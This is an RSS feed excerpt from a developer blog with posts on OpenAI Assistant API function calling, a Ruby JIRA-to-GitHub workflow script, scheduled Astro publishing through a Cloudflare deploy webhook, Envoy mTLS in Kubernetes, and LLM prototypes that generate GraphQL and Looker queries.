&lt;p&gt;&lt;strong&gt;Ease of Testing in the Playground&lt;/strong&gt;: The API&apos;s &lt;a href=&quot;https://platform.openai.com/playground&quot;&gt;playground&lt;/a&gt; feature provides an easy-to-use environment for testing and fine-tuning the assistant’s responses.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Advantages of Function Calling&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Argument Structuring&lt;/strong&gt;: Function calling automates the process of structuring necessary arguments for function execution, making the backend processing more efficient.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Response Generation&lt;/strong&gt;: Without the need for special prompt tuning, the assistant generates responses that align with the structure of the function arguments, ensuring consistency and relevance in the dialogue.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Sequence Diagram of Chat Functionality&lt;/h2&gt;
&lt;p&gt;Although the overall process is well documented in OpenAI&apos;s official documents, a sequence diagram provides a clearer picture:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://platform.openai.com/docs/assistants/overview&quot;&gt;Assistants Overview - OpenAI API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://platform.openai.com/docs/assistants/how-it-works&quot;&gt;How Assistants Work - OpenAI API&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/openai-assistant-api-and-function-calling/images/assistant-api-diagram.svg&quot; alt=&quot;Sequence Diagram of Chat Functionality&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Operational Considerations&lt;/h2&gt;
&lt;h3&gt;Security Concerns&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;When executing backend functions using argument names specified in &lt;code&gt;tool_calls&lt;/code&gt;, it&apos;s crucial to validate these arguments, especially in multi-tenant environments. This prevents potential data leaks if an incorrect customer ID is provided. Alternatively, backend functions can be augmented with tenant IDs or other identifiers to ensure secure and appropriate execution.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Operational Notes&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Pay attention to the &lt;a href=&quot;https://platform.openai.com/docs/assistants/how-it-works/run-lifecycle&quot;&gt;Lifecycle of a Thread Run&lt;/a&gt;. It&apos;s important to handle errors and check the state of a thread before transitioning it to the next state. A thread in an &lt;code&gt;in_progress&lt;/code&gt; state cannot be rerun, so implementing proper checks and error handling in the backend is essential for smooth operation.&lt;/li&gt;
&lt;/ul&gt;
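&lt;p&gt;One way to make those state checks explicit is to centralize them in a single dispatcher. The helper below is a hypothetical sketch of my own (the status names come from the run-lifecycle documentation; the action labels and function name are not part of the API) that a backend worker can use to decide whether to poll again, submit tool outputs, or surface an error:&lt;/p&gt;

```typescript
// Run statuses from the Assistants run lifecycle
type RunStatus =
    | "queued" | "in_progress" | "cancelling"          // still running
    | "requires_action"                                 // waiting for tool outputs
    | "completed" | "failed" | "cancelled" | "expired"; // terminal

type NextAction = "poll" | "submit_tool_outputs" | "read_messages" | "report_error";

// Decide what the backend worker should do next for a given run status
function nextAction(status: RunStatus): NextAction {
    switch (status) {
        case "queued":
        case "in_progress":
        case "cancelling":
            return "poll"; // not terminal yet: wait and re-check
        case "requires_action":
            return "submit_tool_outputs"; // execute the requested functions first
        case "completed":
            return "read_messages"; // fetch the assistant's reply from the thread
        case "failed":
        case "cancelled":
        case "expired":
            return "report_error"; // terminal without a usable answer
    }
}

console.log(nextAction("in_progress"));     // poll
console.log(nextAction("requires_action")); // submit_tool_outputs
console.log(nextAction("completed"));       // read_messages
```

&lt;p&gt;Keeping this mapping in one place also makes the &quot;cannot rerun an &lt;code&gt;in_progress&lt;/code&gt; thread&quot; rule easy to enforce: any new user message is rejected or queued while &lt;code&gt;nextAction&lt;/code&gt; still returns &lt;code&gt;poll&lt;/code&gt;.&lt;/p&gt;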
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Integrating the Assistant API with function calling in chatbot applications offers a streamlined and efficient way to handle user interactions. By maintaining context through threads, structuring responses appropriately, and ensuring secure and correct backend processing, developers can create more effective and user-friendly chatbot experiences. As always, careful consideration of the operational aspects, especially around security and state management, is crucial in deploying such systems.&lt;/p&gt;
</content:encoded></item><item><title>JIRA and GitHub Daily Workflow Script</title><link>https://ainoya.dev/posts/jira-github-daily-workflow-script/</link><guid isPermaLink="true">https://ainoya.dev/posts/jira-github-daily-workflow-script/</guid><description>A script that automates the daily workflow of managing tickets in JIRA and managing code in GitHub.</description><pubDate>Thu, 18 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;When managing tickets in JIRA and managing code in GitHub, the development workflow often involves the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a Git branch named after the JIRA ticket number.&lt;/li&gt;
&lt;li&gt;Retrieve the ticket title from JIRA using its ticket number.&lt;/li&gt;
&lt;li&gt;Make an empty commit in Git with the ticket number and title.&lt;/li&gt;
&lt;li&gt;Push the branch to GitHub.&lt;/li&gt;
&lt;li&gt;Create a draft Pull Request (PR) on GitHub and fill the PR template with the JIRA ticket link.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To simplify this process, I crafted a script that accomplishes these tasks in one go. The usage is straightforward:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;./jw PRJ-1234
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The script leverages &lt;a href=&quot;https://github.com/go-jira/jira&quot;&gt;go-jira/jira&lt;/a&gt; and the &lt;a href=&quot;https://docs.github.com/en/github-cli/github-cli/about-github-cli&quot;&gt;GitHub CLI&lt;/a&gt;. It&apos;s important to have these CLI tools set up beforehand.&lt;/p&gt;
&lt;p&gt;Here’s an overview of the script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env ruby
# Fetch information from JIRA, create a branch,
# push it and create a draft PR

require &apos;json&apos;
require &apos;tempfile&apos;

# Retrieve the first argument
key=ARGV[0]
# If key is missing, print an error and exit with failure
if key.nil?
  puts &quot;Please input a key&quot;
  exit 1
end
puts &quot;Fetching information for #{key}&quot;

info=JSON.parse(`jira view #{key} -t debug`)

parent_key=info.dig(&quot;fields&quot;, &quot;parent&quot;, &quot;key&quot;)
issue_summary=info[&quot;fields&quot;][&quot;summary&quot;]

comment=&quot;#{key} #{issue_summary}&quot;

# If parent_key exists, fetch information of the parent
if parent_key != nil then
  parent_info=JSON.parse(`jira view #{parent_key} -t debug`)
  parent_summary=parent_info[&quot;fields&quot;][&quot;summary&quot;]
  puts &quot;#{parent_summary}&quot;
  comment=&quot;#{key} #{parent_summary} / #{issue_summary}&quot;
end

puts &quot;Starting work on #{comment}&quot;

puts `git checkout master &amp;amp;&amp;amp; git pull origin master`
# Exit if there&apos;s an error
unless $?.success?
  puts &quot;Failed to git pull&quot;
  exit 1
end

puts `git checkout -b #{key}`

puts `git commit --allow-empty -m &quot;#{comment}&quot;`

# Prompt for yes/no input
def prompt_for_yes_no
  loop do
    print &quot;Do you want to push? (yes/y/no): &quot;

    case $stdin.gets.chomp.downcase
    when &quot;yes&quot;
      return true
    when &quot;y&quot;
      return true
    else
      return false
    end
  end
end

push_command = &quot;git push origin #{key}&quot;

# Open .github/PULL_REQUEST_TEMPLATE.md and embed the key in the corresponding ticket line
#
# - {{JIRA_TICKET_LINK}}
#
template_path = &quot;.github/PULL_REQUEST_TEMPLATE.md&quot;
template = File.read(template_path)
template.gsub!(/{{JIRA_TICKET_LINK}}/, &quot;#{key}&quot;)
# Create a temporary file using Tempfile and write to it
pr_body = Tempfile.open do |f|
  f.write(template)
  f
end.path

# Create a DRAFT PR using the gh command
gh_command = &quot;gh pr create --title &apos;#{comment}&apos; --body-file #{pr_body}  --draft&quot;

if prompt_for_yes_no then
  puts `#{push_command}`
  # Create a DRAFT PR with the comment title using the GH command
  puts `#{gh_command}`
else
  puts &quot;Did not push. If you want to push and create a pr, please execute the following commands&quot;
  puts push_command
  puts gh_command
end

&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Key Takeaways&lt;/h2&gt;
&lt;p&gt;This time, I developed the tool using ChatGPT and GitHub Copilot. In the past, writing small tools often meant programming while searching through Google. However, using ChatGPT and GitHub Copilot, the development process has evolved into something akin to sculpting from a block of Large Language Models (LLMs), which are like a compressed representation of the internet, as mentioned in &lt;a href=&quot;https://www.newyorker.com/tech/annals-of-technology/chatgpt-is-a-blurry-jpeg-of-the-web&quot;&gt;The New Yorker&lt;/a&gt;. Through prompts, I carve out tools that meet my specific needs, a process that feels like sculpting. This approach, much like a sculptor&apos;s craft, is an immensely enjoyable experience.&lt;/p&gt;
</content:encoded></item><item><title>Scheduled Article Publishing in Astro with Cloudflare Pages</title><link>https://ainoya.dev/posts/scheduled-post-astro/</link><guid isPermaLink="true">https://ainoya.dev/posts/scheduled-post-astro/</guid><description>Discover how to implement scheduled article publishing on an Astro-built website, hosted on Cloudflare Pages.</description><pubDate>Tue, 16 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Astro, a powerful framework for building modern websites, offers efficient static build capabilities. In collaboration with Cloudflare Pages, it provides a robust hosting solution. An intriguing feature I wanted to implement on my blog (hosted on Cloudflare Pages and built with Astro) was scheduled article publishing. This feature allows articles to be automatically published when the current date matches their predefined publication date.&lt;/p&gt;
&lt;h2&gt;Strategy for Scheduled Publishing&lt;/h2&gt;
&lt;p&gt;To achieve scheduled article publishing, I employed a two-step approach:&lt;/p&gt;
&lt;h3&gt;1. Adding &lt;code&gt;publishDate&lt;/code&gt; Metadata to Content Collection&lt;/h3&gt;
&lt;p&gt;Firstly, I added a &lt;code&gt;publishDate&lt;/code&gt; metadata field to the content collection. This date determines when an article should be published. By checking if this date matches the current date, the system decides whether to publish the post. Astro&apos;s documentation on &lt;a href=&quot;https://docs.astro.build/en/guides/content-collections/#working-with-dates-in-the-frontmatter&quot;&gt;content collections and handling dates&lt;/a&gt; was instrumental in implementing this.&lt;/p&gt;
&lt;h3&gt;2. Modifying the Build Script for Date Comparison&lt;/h3&gt;
&lt;p&gt;Secondly, I modified the build script to include a function that compares the &lt;code&gt;publishDate&lt;/code&gt; with the build date. This function filters out any posts that are marked as drafts or have a future publish date. The TypeScript code snippet below illustrates this process:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/** Filters out draft posts based on the environment and the post&apos;s publishDate **/
export async function getAllPosts() {
 return await getCollection(&quot;post&quot;, ({ data }) =&amp;gt; {
  const isNotDraft = import.meta.env.PROD ? data.draft !== true : true;
  // Treat posts with a future publishDate as drafts
  const isNotFuture = import.meta.env.PROD
   ? data.publishDate.valueOf() &amp;lt;= new Date().valueOf()
   : true;

  return isNotDraft &amp;amp;&amp;amp; isNotFuture;
 });
}
&lt;/code&gt;&lt;/pre&gt;
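&lt;p&gt;The date logic becomes easier to verify if the predicate is pulled out of the Astro-specific wrapper. The helper below is a hypothetical refactoring of the same check (&lt;code&gt;getCollection&lt;/code&gt; and &lt;code&gt;import.meta.env&lt;/code&gt; above are Astro APIs; this function has no Astro dependency, so it can be unit-tested directly):&lt;/p&gt;

```typescript
type PostMeta = { draft?: boolean; publishDate: Date };

// In production builds a post is shown only if it is not a draft and
// its publishDate is not in the future; dev builds show everything.
function isPublishable(data: PostMeta, now: Date, isProd: boolean): boolean {
    if (!isProd) return true;
    const isNotDraft = data.draft !== true;
    const isNotFuture = data.publishDate.valueOf() <= now.valueOf();
    return isNotDraft && isNotFuture;
}

const now = new Date("2024-01-16T00:00:00Z");
console.log(isPublishable({ publishDate: new Date("2024-01-15") }, now, true));              // true
console.log(isPublishable({ publishDate: new Date("2024-02-01") }, now, true));              // false: future
console.log(isPublishable({ draft: true, publishDate: new Date("2024-01-01") }, now, true)); // false: draft
console.log(isPublishable({ draft: true, publishDate: new Date("2024-02-01") }, now, false)); // true: dev build
```

&lt;p&gt;Passing &lt;code&gt;now&lt;/code&gt; as an argument rather than calling &lt;code&gt;new Date()&lt;/code&gt; inside the function is what makes the boundary cases around the build date testable.&lt;/p&gt;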
&lt;h2&gt;Automating Deployment with Cloudflare Pages and GitHub Actions&lt;/h2&gt;
&lt;p&gt;To ensure that this scheduled publishing mechanism works effectively, I automated the build and deployment process of the site. Cloudflare Pages offers a feature called &lt;a href=&quot;https://developers.cloudflare.com/pages/configuration/deploy-hooks/&quot;&gt;Deploy Webhook&lt;/a&gt;, which triggers the build and deployment of pages when it receives a POST request. I utilized GitHub Actions to send this POST request to the Deploy Webhook daily. Below is an example YAML configuration for the GitHub Actions workflow:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Only articles with a past or present publishDate are displayed in the Astro build
# Thus, we perform a daily deployment with a date condition check

name: &quot;Daily Deploy&quot;

on:
  # daily at 00:00 UTC
  schedule:
    - cron: &quot;0 0 * * *&quot;
  # for debugging purposes
  workflow_dispatch:

jobs:
  # Trigger deploy webhook with curl
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy
        run: curl -X POST -d &apos;{}&apos; &quot;${{ secrets.CLOUDFLARE_DEPLOY_WEBHOOK }}&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This setup guarantees that the website is rebuilt daily, ensuring that any article with the current date as its &lt;code&gt;publishDate&lt;/code&gt; gets published automatically. This approach leverages the static build performance of Astro while introducing dynamic elements like scheduled publishing, making the blog more efficient.&lt;/p&gt;
</content:encoded></item><item><title>Securing k8s Service Communication with Envoy</title><link>https://ainoya.dev/posts/envoy-mtls-demo/</link><guid isPermaLink="true">https://ainoya.dev/posts/envoy-mtls-demo/</guid><description>Delve into the nuances of enhancing security in Kubernetes clusters by implementing mutual TLS (mTLS) using Envoy.</description><pubDate>Sun, 14 Jan 2024 08:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/envoy-mtls-demo/images/envoy-mtls-demo.svg&quot; alt=&quot;Diagram&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In this article, I&apos;ll introduce an example of implementing secure service-to-service communication using Envoy. The motivation for this experiment was to secure gRPC communications within a Kubernetes (k8s) cluster. While it&apos;s possible to implement secure authentication at the application layer, achieving this at the infrastructure layer can reduce the concerns in application implementation, offering significant benefits.&lt;/p&gt;
&lt;p&gt;For this experiment, I tried communication using client certificate authentication. The code for this experiment is stored in the following GitHub repository:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ainoya/envoy-mtls-demo&quot;&gt;github.com/ainoya/envoy-mtls-demo&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The sample runs Envoy as a sidecar in k8s: a client-side pod (application container + Envoy sidecar container) communicates with a server-side pod (Envoy sidecar container + application container).&lt;/p&gt;
&lt;h3&gt;Implementing mTLS with Envoy&lt;/h3&gt;
&lt;h4&gt;Generating Certificates&lt;/h4&gt;
&lt;p&gt;Generating the CA, server, and client certificates is straightforward with &lt;a href=&quot;https://github.com/cloudflare/cfssl&quot;&gt;cfssl&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To ensure that only specific client certificates are accepted in Envoy, use &lt;code&gt;validation_context&lt;/code&gt; and &lt;a href=&quot;https://www.envoyproxy.io/docs/envoy/latest/api-v3/extensions/transport_sockets/tls/v3/common.proto#envoy-v3-api-field-extensions-transport-sockets-tls-v3-certificatevalidationcontext-match-typed-subject-alt-names&quot;&gt;&lt;code&gt;match_typed_subject_alt_names&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;First, create a Certificate Authority (CA):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Example CA creation
$ cat certs/ca/ca-csr.json
{
    &quot;CN&quot;: &quot;app-ca&quot;,
    &quot;hosts&quot;: [&quot;&quot;],
    &quot;key&quot;: {
        &quot;algo&quot;: &quot;ecdsa&quot;,
        &quot;size&quot;: 256
    },
    &quot;names&quot;: [
        {
            &quot;O&quot;: &quot;app-ca&quot;,
            &quot;OU&quot;: &quot;development&quot;,
            &quot;ST&quot;: &quot;Tokyo&quot;,
            &quot;C&quot;: &quot;JP&quot;
        }
    ],
    &quot;ca&quot;: {
        &quot;expiry&quot;: &quot;876000h&quot;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;# Create the CA key and certificate with cfssl, cfssljson
cd certs/ca
cfssl genkey -initca ca-csr.json | cfssljson -bare ca
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, generate server certificates using this CA:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Example server certificate creation
$ cat certs/server/server-config.json
{
  &quot;signing&quot;: {
    &quot;default&quot;: {
      &quot;expiry&quot;: &quot;876000h&quot;,
      &quot;usages&quot;: [
        &quot;signing&quot;,
        &quot;key encipherment&quot;,
        &quot;server auth&quot;
      ]
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;$ cat certs/server/server.json
{
  &quot;CN&quot;: &quot;app-internal-api&quot;,
  &quot;hosts&quot;: [&quot;&quot;],
  &quot;key&quot;: {
    &quot;algo&quot;: &quot;ecdsa&quot;,
    &quot;size&quot;: 256
  },
  &quot;names&quot;: [
    {
      &quot;ST&quot;: &quot;Tokyo&quot;,
      &quot;C&quot;: &quot;JP&quot;
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;cd certs/server
cfssl gencert -ca=../ca/ca.pem -ca-key=../ca/ca-key.pem \
  -config=./server-config.json server.json | cfssljson -bare server
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, generate client certificates that will communicate with this server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat certs/client/client-config.json
{
  &quot;signing&quot;: {
    &quot;default&quot;: {
      &quot;expiry&quot;: &quot;876000h&quot;,
      &quot;usages&quot;: [
        &quot;signing&quot;,
        &quot;key encipherment&quot;,
        &quot;client auth&quot;
      ]
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;$ cat certs/client/client.json
{
  &quot;CN&quot;: &quot;appclient&quot;,
  &quot;hosts&quot;: [&quot;app-internal-api&quot;],
  &quot;key&quot;: {
    &quot;algo&quot;: &quot;ecdsa&quot;,
    &quot;size&quot;: 256
  },
  &quot;names&quot;: [
    {
      &quot;ST&quot;: &quot;Tokyo&quot;,
      &quot;C&quot;: &quot;JP&quot;
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that the &lt;code&gt;hosts&lt;/code&gt; field must contain the names that &lt;code&gt;match_typed_subject_alt_names&lt;/code&gt; will validate.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cd certs/client
cfssl gencert -ca=../ca/ca.pem -ca-key=../ca/ca-key.pem \
  -config=./client-config.json client.json | cfssljson -bare client
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;match_typed_subject_alt_names&lt;/code&gt;, requests trying to authenticate with a client certificate that doesn&apos;t match the host name will be rejected with a &lt;code&gt;CERTIFICATE_VERIFY_FAILED&lt;/code&gt; error.&lt;/p&gt;
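&lt;p&gt;As a sketch, the server-side listener&apos;s TLS context might restrict clients like this (field names follow Envoy&apos;s v3 TLS API; the file paths are illustrative):&lt;/p&gt;

```yaml
# Hedged sketch: accept only client certificates signed by our CA whose
# SAN is exactly app-internal-api.
require_client_certificate: true
common_tls_context:
  tls_certificates:
    - certificate_chain: { filename: /etc/certs/server.pem }
      private_key: { filename: /etc/certs/server-key.pem }
  validation_context:
    trusted_ca: { filename: /etc/certs/ca.pem }
    match_typed_subject_alt_names:
      - san_type: DNS
        matcher:
          exact: app-internal-api
```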
&lt;p&gt;For more detailed examples of Envoy configuration, refer to the demo repository:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ainoya/envoy-mtls-demo/blob/main/envoy-conf/app-internal-api-envoy.yaml&quot;&gt;Server-side Envoy Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ainoya/envoy-mtls-demo/blob/main/envoy-conf/example-mtls-access-envoy-conf.yaml&quot;&gt;Client-side Envoy Configuration&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Manifest Configuration for Deployment in k8s&lt;/h3&gt;
&lt;p&gt;For configuring the client-side k8s manifest, consider the following setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Include processes that terminate the sidecar when the main container exits.
&lt;ul&gt;
&lt;li&gt;Share an &lt;code&gt;emptyDir&lt;/code&gt; volume between the main container and the sidecar container, and create a file upon exit of the main container. The sidecar should terminate itself upon detecting this file.&lt;/li&gt;
&lt;li&gt;From k8s 1.28 onwards, a restartable init container (&lt;code&gt;initContainers&lt;/code&gt; with &lt;code&gt;restartPolicy: Always&lt;/code&gt;) makes such workarounds unnecessary. &lt;a href=&quot;https://kubernetes.io/blog/2023/08/25/native-sidecar-containers/&quot;&gt;Kubernetes v1.28: Introducing native sidecar containers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Ensure that the application starts after the sidecar is ready.&lt;/li&gt;
&lt;li&gt;Here&apos;s an excerpt of the configuration:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;- name: app
  # ...
  command:
    - /bin/bash
    - -c
    # 1. Set up a trap to terminate the envoy sidecar after the batch process ends.
    # 2. Simple waiting loop until Envoy is up
    - trap &quot;touch /tmp/pod/main-terminated&quot; EXIT &amp;amp;&amp;amp; while ! nc -z 0.0.0.0 2443; do echo &quot;Waiting for the envoy sidecar to be up...&quot;; sleep 1; done &amp;amp;&amp;amp; /path/your/application-command $@
    - --
  args:
    - # application args
- name: envoy
  image: envoyproxy/envoy:v1.28-latest
  command:
    - /bin/sh
    - -c
  args:
    - |
      envoy \
        -c /etc/envoy/client-conf.yaml &amp;amp;
      CHILD_PID=$!
      (while true; do if [[ -f &quot;/tmp/pod/main-terminated&quot; ]]; then kill $CHILD_PID; echo &quot;Killed $CHILD_PID as the main container terminated.&quot;; fi; sleep 1; done) &amp;amp;
      wait $CHILD_PID
      if [[ -f &quot;/tmp/pod/main-terminated&quot; ]]; then echo &quot;Job completed. Exiting...&quot;; exit 0; fi
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;gRPC Load Balancing&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;gRPC communicates over an established TCP connection, which can lead to load imbalances if the connections are unevenly distributed across backend servers.&lt;/li&gt;
&lt;li&gt;Normally, k8s services function as L4 load balancers and cannot manage L7 load distribution.&lt;/li&gt;
&lt;li&gt;To address this, start k8s services in &lt;a href=&quot;https://kubernetes.io/docs/concepts/services-networking/service/#headless-services&quot;&gt;headless mode&lt;/a&gt; and let Envoy handle the load balancing. In this setup, the Envoy sidecar container on the client side plays this role.&lt;/li&gt;
&lt;/ul&gt;
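&lt;p&gt;A minimal headless Service for the server pods might look like this (the name and port are illustrative). Because &lt;code&gt;clusterIP: None&lt;/code&gt; makes DNS return every pod IP, the client-side Envoy can resolve all endpoints (for example with a &lt;code&gt;STRICT_DNS&lt;/code&gt; cluster) and balance gRPC requests at L7:&lt;/p&gt;

```yaml
# Hedged sketch of a headless Service; names and ports are assumptions.
apiVersion: v1
kind: Service
metadata:
  name: app-internal-api
spec:
  clusterIP: None   # headless: DNS resolves to individual pod IPs
  selector:
    app: app-internal-api
  ports:
    - port: 8443
      targetPort: 8443
```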
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;h4&gt;Further Developments&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;For large-scale applications of this mTLS setup, consider using &lt;a href=&quot;https://docs.aws.amazon.com/app-mesh/latest/userguide/what-is-app-mesh.html&quot;&gt;AWS AppMesh&lt;/a&gt; or &lt;a href=&quot;https://istio.io/&quot;&gt;Istio&lt;/a&gt;, which can automate configurations.
&lt;ul&gt;
&lt;li&gt;Sidecar configurations can be automatically injected using a mutating webhook.
&lt;ul&gt;
&lt;li&gt;Example with AppMesh: &lt;a href=&quot;https://aws.github.io/aws-app-mesh-controller-for-k8s/reference/injector/&quot;&gt;SidecarInjection - AWS App Mesh Controller&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Integration of Istio with Vault can automate certificate issuance.
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://istio.io/v1.2/docs/tasks/security/vault-ca/&quot;&gt;Istioldie 1.2 / Istio Vault CA Integration&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This article aimed to provide practical insights into setting up secure service-to-service communication within a Kubernetes cluster using Envoy and mTLS. Feel free to refer to the provided repository for a hands-on demonstration and detailed configuration examples.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/&quot;&gt;What is mTLS? | Mutual TLS | Cloudflare&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Enhancing Tools with OpenAI API: Insights from Past Projects</title><link>https://ainoya.dev/posts/chatgpt-prototyping-2023/</link><guid isPermaLink="true">https://ainoya.dev/posts/chatgpt-prototyping-2023/</guid><description>Converting natural language queries into structured formats made easy</description><pubDate>Wed, 10 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Early in the previous year, following the launch of OpenAI&apos;s GPT-3.5, I initiated a project to improve existing tools&apos; user experience using the OpenAI API. This article focuses on two significant instances from this project.&lt;/p&gt;
&lt;h2&gt;Transforming Unstructured Data into Structured, Machine-Readable Formats&lt;/h2&gt;
&lt;p&gt;One of the key features I focused on was the ability to easily convert unstructured data into structured, machine-readable formats like JSON. This capability was utilized in two distinct applications, both of which were rapidly prototyped using LangChain and Streamlit.&lt;/p&gt;
&lt;h3&gt;Example 1: &lt;a href=&quot;https://github.com/ainoya/graphql-gpt&quot;&gt;ainoya/graphql-gpt&lt;/a&gt;&lt;/h3&gt;
&lt;h4&gt;Converting Natural Language Queries into GraphQL&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;The aim was to transform natural language questions into GraphQL queries.&lt;/li&gt;
&lt;li&gt;In-context learning was employed, embedding the GraphQL schema within the prompt, to facilitate this conversion.&lt;/li&gt;
&lt;li&gt;Additionally, the implementation included executing the resulting queries and retrieving results from a GraphQL server. A protective layer for query execution would likely be necessary to prevent data retrieval beyond the intended scope in real-world applications.&lt;/li&gt;
&lt;/ul&gt;
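&lt;p&gt;The prompt construction can be sketched as follows. The schema and helper below are hypothetical, and the real project uses LangChain rather than this hand-rolled string:&lt;/p&gt;

```python
# Illustrative sketch of in-context learning for query generation: the
# GraphQL schema is pasted into the prompt so the model can ground its output.
SCHEMA = """
type Query { user(id: ID!): User }
type User { id: ID! name: String }
"""

def build_prompt(question):
    """Assemble a prompt that embeds the schema before the user question."""
    return (
        "Given this GraphQL schema:\n"
        + SCHEMA
        + "\nWrite a GraphQL query answering: "
        + question
    )

print(build_prompt("What is the name of user 42?"))
```

&lt;p&gt;In the real tool, the generated query is then executed against the GraphQL server, which is why a protective layer around execution matters.&lt;/p&gt;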
&lt;h3&gt;Example 2: &lt;a href=&quot;https://github.com/ainoya/gpt-looker&quot;&gt;ainoya/gpt-looker&lt;/a&gt;&lt;/h3&gt;
&lt;h4&gt;Natural Language to Looker Queries&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Similar to the first example, this project involved converting natural language questions into Looker queries.&lt;/li&gt;
&lt;li&gt;LookML schemas were embedded in the prompt for in-context learning responses.&lt;/li&gt;
&lt;li&gt;Due to the size of LookML definitions, there was a challenge of context overflow when included directly in the prompt. This was addressed by preprocessing LookML into segments, converting them into embeddings, and storing them on &lt;a href=&quot;https://www.trychroma.com/&quot;&gt;Chroma&lt;/a&gt;. During a query, the most relevant schema was searched and retrieved, a technique known as Retrieval Augmented Generation (RAG).&lt;/li&gt;
&lt;li&gt;Given that Looker is a Google product, I anticipate similar functionalities may be implemented in tools like &lt;a href=&quot;https://deepmind.google/technologies/gemini/#introduction&quot;&gt;Gemini by Google DeepMind&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
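&lt;p&gt;The retrieval step can be sketched as follows. This is an illustration only: a toy bag-of-words vector stands in for a real embedding model, and all names are hypothetical; the project stores real embeddings in Chroma:&lt;/p&gt;

```python
# Toy RAG retrieval sketch: chunk the LookML, embed each chunk, and fetch
# the chunks most similar to the question.
from collections import Counter
import math

def embed(text):
    """Toy embedding: term-frequency vector over whitespace tokens."""
    return Counter(text.lower().split())

def cosine(a, b):
    dot = sum(a[t] * b[t] for t in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve(chunks, question, k=1):
    """Return the k chunks most similar to the question."""
    q = embed(question)
    return sorted(chunks, key=lambda c: cosine(embed(c), q), reverse=True)[:k]

chunks = [
    "view orders measure total revenue sum of sale price",
    "view users dimension country of user",
]
print(retrieve(chunks, "total revenue last month", k=1))
```

&lt;p&gt;Only the retrieved chunks are placed in the prompt, which keeps the LookML context within the model&apos;s window.&lt;/p&gt;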
&lt;h2&gt;Conclusion&lt;/h2&gt;
